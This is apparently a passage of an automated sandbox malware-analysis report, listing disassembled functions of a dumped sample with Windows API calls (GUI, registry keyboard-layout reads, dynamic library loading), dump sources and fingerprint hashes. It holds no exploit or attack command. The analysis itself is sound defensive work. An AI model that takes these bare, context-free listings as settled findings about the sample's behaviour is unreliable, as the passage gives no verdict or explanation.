                                                                                                    • SaveDC.GDI32(?), ref: 032EFD91
                                                                                                      • Part of subcall function 032E8B8C: GetWindowOrgEx.GDI32(00000000), ref: 032E8B9A
                                                                                                      • Part of subcall function 032E8B8C: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 032E8BB0
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 032EFDCA
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 032EFDDE
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032EFDFF
                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 032EFE2F
                                                                                                    • DrawEdge.USER32(?,?,00000000,00000000), ref: 032EFE3E
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 032EFE67
                                                                                                    • RestoreDC.GDI32(?,?), ref: 032EFEE6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976466617-0
                                                                                                    • Opcode ID: 8614fe5fa27626fdb040acc37287d2d850e1e9f62c4730fbe640060574c6f1ee
                                                                                                    • Instruction ID: 30efbe3339ff04c96dd47fcde054e2025cbfefa436f7a881cd2d48565dd58e5d
                                                                                                    • Opcode Fuzzy Hash: 8614fe5fa27626fdb040acc37287d2d850e1e9f62c4730fbe640060574c6f1ee
                                                                                                    • Instruction Fuzzy Hash: 4F410D75A10309AFDB10DB98C981F9EB7B8EF48300F5541A4F614EB392C775AE80CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 03303BFA
                                                                                                    • IsWindowUnicode.USER32(00000000), ref: 03303C3D
                                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,02BE67A0,?), ref: 03303C58
                                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,02BE67A0,?), ref: 03303C77
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 03303C86
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 03303C94
                                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,02BE67A0,?), ref: 03303CB4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1994056952-0
                                                                                                    • Opcode ID: 06393541d494b79cb18f411f6f046d5007551d2a5c70ead2d650a19ad48b6f7d
                                                                                                    • Instruction ID: a163593275cb1e168003ca66783ac122d2758d96dcbbbe2cfb273842a79f2bad
                                                                                                    • Opcode Fuzzy Hash: 06393541d494b79cb18f411f6f046d5007551d2a5c70ead2d650a19ad48b6f7d
                                                                                                    • Instruction Fuzzy Hash: B7214B79314309AFD660FA5DCDD0F67B3EC9F45660F184828F959CB782DA60F8448764
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D3A8E
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 032D3AAA
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 032D3AC9
                                                                                                    • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 032D3AED
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 032D3B0B
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 032D3B1F
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 032D3B3F
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032D3B57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1781840570-0
                                                                                                    • Opcode ID: 662bf5cc08e42f5a7a935c941411e9de4d57edae530f76f8cdaf9d0b877c9924
                                                                                                    • Instruction ID: dbcf3d38cd6b01de896368fb1a2e9c7fdb9ae2cc0034b931a6c3917b7c85835e
                                                                                                    • Opcode Fuzzy Hash: 662bf5cc08e42f5a7a935c941411e9de4d57edae530f76f8cdaf9d0b877c9924
                                                                                                    • Instruction Fuzzy Hash: 322124B5A50309AEDB10DBA4CD85FAEB3BCEB48744F500591B704EB180D6B59E84CB25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,032DFC05), ref: 032DFA50
                                                                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 032DFB59
                                                                                                      • Part of subcall function 032DFEB8: CreatePopupMenu.USER32 ref: 032DFED3
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 032DFBE2
                                                                                                      • Part of subcall function 032DFEB8: CreateMenu.USER32 ref: 032DFEDD
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 032DFBC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                    • String ID: ,$?
                                                                                                    • API String ID: 2359071979-2308483597
                                                                                                    • Opcode ID: 383b2d1e24b8f05dcf1a1adae940abcb4eea94474ea74e5141fa252d462faba4
                                                                                                    • Instruction ID: f9afa8d7713240f50607c08982ba88ef5ee46897357414a734e63bf5643ec373
                                                                                                    • Opcode Fuzzy Hash: 383b2d1e24b8f05dcf1a1adae940abcb4eea94474ea74e5141fa252d462faba4
                                                                                                    • Instruction Fuzzy Hash: 94611334A34345AFCB10EF68D9C0AAEB7F8AF05740F4844A5E851EB39AD374D994CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,032F3904), ref: 032F3805
• GetTickCount.KERNEL32 ref: 032F380A
• SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 032F384E
• SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 032F3866
• AnimateWindow.USER32(00000000,00000064,?), ref: 032F38AB
• ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,032F3904), ref: 032F38CE
  • Part of subcall function 032F6EE0: GetCursorPos.USER32(?), ref: 032F6EE4
• GetTickCount.KERNEL32 ref: 032F38EB
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
• String ID:
• API String ID: 3024527889-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 033054C0: GetActiveWindow.USER32 ref: 033054E7
  • Part of subcall function 033054C0: GetLastActivePopup.USER32(?), ref: 033054F9
• GetWindowRect.USER32(?,?), ref: 03304196
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 033041CE
• MessageBoxA.USER32(00000000,?,?,?), ref: 0330420D
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,03304283), ref: 0330425D
• SetActiveWindow.USER32(00000000,03304283), ref: 0330426E
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Window$Active$LastMessagePopupRect
• String ID: (
• API String ID: 3456420849-3887548279
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetKeyboardLayoutList.USER32(00000040,?,00000000,03301B9B,?,02BED9D0,?,03301BFD,00000000,?,032ED247), ref: 03301A46
• RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 03301AAE
• RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,03301B57,?,80000002,00000000), ref: 03301AE8
• RegCloseKey.ADVAPI32(?,03301B5E,00000000,?,00000100,00000000,03301B57,?,80000002,00000000), ref: 03301B51
Strings
• System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 03301A98
• layout text, xrefs: 03301ADF
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CloseKeyboardLayoutListOpenQueryValue
• String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
• API String ID: 1703357764-2652665750
Uniqueness
Uniqueness Score: -1.00%

APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 03303E18
• IsWindowUnicode.USER32 ref: 03303E2C
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03303E4D
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 03303E63
• TranslateMessage.USER32 ref: 03303EEC
• DispatchMessageW.USER32 ref: 03303EF8
• DispatchMessageA.USER32 ref: 03303F00
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
• String ID:
• API String ID: 2190272339-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(00000000,000000F0), ref: 032FD179
• GetWindowLongA.USER32(00000000,000000EC), ref: 032FD18B
• GetClassLongA.USER32(00000000,000000E6), ref: 032FD19E
• SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 032FD1DE
• SetWindowLongA.USER32(00000000,000000EC,?), ref: 032FD1F2
• SetClassLongA.USER32(00000000,000000E6,?), ref: 032FD206
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 032FD222
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Long$Window$Class
• String ID:
• API String ID: 2026531576-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 03301D91
• CreateFontIndirectA.GDI32(?), ref: 03301D9E
• GetStockObject.GDI32(0000000D), ref: 03301DB4
  • Part of subcall function 032D2530: MulDiv.KERNEL32(00000000,?,00000048), ref: 032D253D
• SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 03301DDD
• CreateFontIndirectA.GDI32(?), ref: 03301DED
• CreateFontIndirectA.GDI32(?), ref: 03301E06
• GetStockObject.GDI32(0000000D), ref: 03301E2C
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CreateFontIndirect$InfoObjectParametersStockSystem
• String ID:
• API String ID: 2891467149-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 032BC91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,032BC9F2), ref: 032BC95E
  • Part of subcall function 032BC91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,032BC9D5,?,00000000,?,00000000,032BC9F2), ref: 032BC993
  • Part of subcall function 032BC91C: VerQueryValueA.VERSION(?,032BCA04,?,?,00000000,?,00000000,?,00000000,032BC9D5,?,00000000,?,00000000,032BC9F2), ref: 032BC9AD
• GetModuleHandleA.KERNEL32(comctl32.dll), ref: 03306CBC
• GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 03306CCD
• ImageList_Write.COMCTL32(00000000,?,00000000,03306D82), ref: 03306D4C
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
• String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
• API String ID: 4063495462-3125200627
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetKeyboardLayoutNameA.USER32(00000000), ref: 032E3048
  • Part of subcall function 032D02BC: RegCloseKey.ADVAPI32(10940000,032D0198,00000001,032D023A,?,?,032D76D2,00000008,00000060,00000048,00000000,032D7777), ref: 032D02D0
  • Part of subcall function 032D0320: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C
  • Part of subcall function 032BDC04: SetErrorMode.KERNEL32 ref: 032BDC0E
  • Part of subcall function 032BDC04: LoadLibraryA.KERNEL32(00000000,00000000,032BDC58,?,00000000,032BDC76), ref: 032BDC3D
• GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 032E30D9
• FreeLibrary.KERNEL32(?,032E3113,?,00000000,032E3153), ref: 032E3106
Strings
• Layout File, xrefs: 032E30A5
• KbdLayerDescriptor, xrefs: 032E30D0
• \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 032E308D
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
• String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
• API String ID: 3365787578-2194312379
                                                                                                    • Opcode ID: 8ba846377d851c12c3afae8a68413563aa3eb088c6b22035885ed69c4f01f63e
                                                                                                    • Instruction ID: c0580471e2cc92cf1e1d1eb28c46f627546dfc3df19e462df6c802b6dcdf6aff
                                                                                                    • Opcode Fuzzy Hash: 8ba846377d851c12c3afae8a68413563aa3eb088c6b22035885ed69c4f01f63e
                                                                                                    • Instruction Fuzzy Hash: A021927CE20348AFCF01EFA4C8519DEB7BAFB49700F508464E510AB710D7789985CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB1E8
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB1FD
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB208
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB232
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                                                                    • API String ID: 2545840971-2774842281
                                                                                                    • Opcode ID: 6aafcf23d88f35272eebfba86ff3474c9c88be2a8b041eceaa2c517e78fd2065
                                                                                                    • Instruction ID: f473c21fb7b9f7452aa363b6bef41a87308bf36b1874410924870a3b05b03fd4
                                                                                                    • Opcode Fuzzy Hash: 6aafcf23d88f35272eebfba86ff3474c9c88be2a8b041eceaa2c517e78fd2065
                                                                                                    • Instruction Fuzzy Hash: EC11B1726113055FE720DF689898BABB7ECEF06710F01852DED8B87640D7B0A4848BE0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB114
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB129
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB134
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB15E
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                                                                    • API String ID: 2545840971-1370492664
                                                                                                    • Opcode ID: ee6e29632e0ede4e3476d54e63f995824e93b6f63274986d392dc502093f8b6a
                                                                                                    • Instruction ID: 9ac274d52c6ca519b585ac2952e2a17799dd5fe389b547652e7dbff82434ab9b
                                                                                                    • Opcode Fuzzy Hash: ee6e29632e0ede4e3476d54e63f995824e93b6f63274986d392dc502093f8b6a
                                                                                                    • Instruction Fuzzy Hash: 8711D3766143499FE720DF699C84BA7B7ECEF05B51F014529ED5797240D3B0E484CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032D3CB4: GetObjectA.GDI32(?,00000004), ref: 032D3CCB
                                                                                                      • Part of subcall function 032D3CB4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 032D3CEE
                                                                                                    • GetDC.USER32(00000000), ref: 032D4ECA
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 032D4ED6
                                                                                                    • SelectObject.GDI32(?), ref: 032D4EE3
                                                                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,032D4F3B,?,?,?,?,00000000), ref: 032D4F07
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D4F21
                                                                                                    • DeleteDC.GDI32(?), ref: 032D4F2A
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032D4F35
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 4046155103-0
                                                                                                    • Opcode ID: 5b360b366d8c0e3ba9cc3638ae0f5b3b36151fe7fd78c22e1f6eba240d890173
                                                                                                    • Instruction ID: 91f74bcafe5d2dd7dec6a64219b8140b16486eb7fa5851f728d5abbd183bc3ee
                                                                                                    • Opcode Fuzzy Hash: 5b360b366d8c0e3ba9cc3638ae0f5b3b36151fe7fd78c22e1f6eba240d890173
                                                                                                    • Instruction Fuzzy Hash: 8E115176E143496FDB10EBE8CC50EEEB3BCFB08740F4144A5B604DB250DAB499808750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32 ref: 03301CBB
                                                                                                    • WindowFromPoint.USER32(?,?), ref: 03301CC8
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 03301CD6
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03301CDD
                                                                                                    • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 03301D06
                                                                                                    • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 03301D18
                                                                                                    • SetCursor.USER32(00000000), ref: 03301D2A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1770779139-0
                                                                                                    • Opcode ID: 45e9bd681223f8b42be8e94c5246bdc568ae7b26ec29ea122a9f3bcb04f0fc47
                                                                                                    • Instruction ID: 1745c25757c11f0bcb4a3593470004af844d83b0e167c5f9d50a83a23d99f90a
                                                                                                    • Opcode Fuzzy Hash: 45e9bd681223f8b42be8e94c5246bdc568ae7b26ec29ea122a9f3bcb04f0fc47
                                                                                                    • Instruction Fuzzy Hash: E601D22E51430075CA20EB688CC4BBB76B9DFC0B80F14445AFA849A191E665CC409326
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032BBE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 032BBE59
                                                                                                      • Part of subcall function 032BBE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032BBE7D
                                                                                                      • Part of subcall function 032BBE3C: GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032BBE98
                                                                                                      • Part of subcall function 032BBE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 032BBF2E
                                                                                                    • CharToOemA.USER32(?,?), ref: 032BBFFB
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 032BC018
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032BC01E
                                                                                                    • GetStdHandle.KERNEL32(000000F4,032BC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032BC033
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,032BC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032BC039
                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 032BC05B
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 032BC071
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 185507032-0
